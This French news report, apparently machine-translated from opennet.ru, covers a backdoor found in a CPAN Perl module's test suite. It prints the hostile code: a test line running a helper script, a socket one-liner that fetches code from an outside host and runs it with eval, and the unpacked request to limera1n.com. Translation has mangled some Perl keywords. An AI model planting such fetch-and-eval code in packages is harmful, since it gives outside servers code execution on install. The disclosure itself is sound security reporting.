Dans un package Perl distribué via le répertoire CPAN , conçu pour charger automatiquement les modules CPAN à la volée, code malicieux. L'insert malveillant était dans le code de test , qui est expédié depuis 2011.
Il est à noter que des questions sur le chargement de code douteux se sont posées sur en 2016.
Une activité malveillante se résume à une tentative de téléchargement et d'exécution de code depuis un serveur tiers (http://r.cx:1/) lors de l'exécution d'une suite de tests lancée lors de l'installation du module. On suppose que le code initialement téléchargé depuis le serveur externe n'était pas malveillant, mais la demande est désormais redirigée vers le domaine ww.limera1n.com, qui fournit sa partie du code pour l'exécution.
Pour organiser le téléchargement dans un fichier Le code suivant est utilisé :
mon $prog = __FILE__ ;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
mon $try = `$^X $prog` ;
Le code spécifié provoque l'exécution du script , dont le contenu se réduit à la ligne :
utilisez lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1″} ;
Ce script se charge utiliser le service code de l'hôte externe r.cx (les codes de caractères 82.46.99.88 correspondent au texte "R.cX") et l'exécute dans le bloc eval.
$ perl -MIO::Socket -e'$b=new IO::Socket::INET 82.46.99.88.":1″; imprimer <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}
Après le déballage, les opérations suivantes sont finalement exécutées : :
print{$b=new IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
";l'évaluation renvoie warn$@while$b;1
Le package problématique a maintenant été supprimé du référentiel. (Perl Authors Upload Server), et le compte de l'auteur du module est bloqué. Dans ce cas, le module reste toujours dans l'archive MetaCPAN et peut être installé directement depuis MetaCPAN à l'aide de certains utilitaires tels que cpanminus. que le paquet n'était pas largement distribué.
Intéressant de discuter et l'auteur du module, qui a nié l'information selon laquelle un code malveillant avait été inséré après le piratage de son site « r.cx » et a expliqué qu'il ne faisait que s'amuser et qu'il a utilisé perlobfuscator.com non pas pour cacher quelque chose, mais pour réduire la taille du code et en simplifiant sa copie via le presse-papier. Le choix du nom de fonction « botstrap » s’explique par le fait que ce mot « ressemble à bot et est plus court que bootstrap ». L'auteur du module a également assuré que les manipulations identifiées n'effectuent pas d'actions malveillantes, mais démontrent uniquement le chargement et l'exécution de code via TCP.
Source: opennet.ru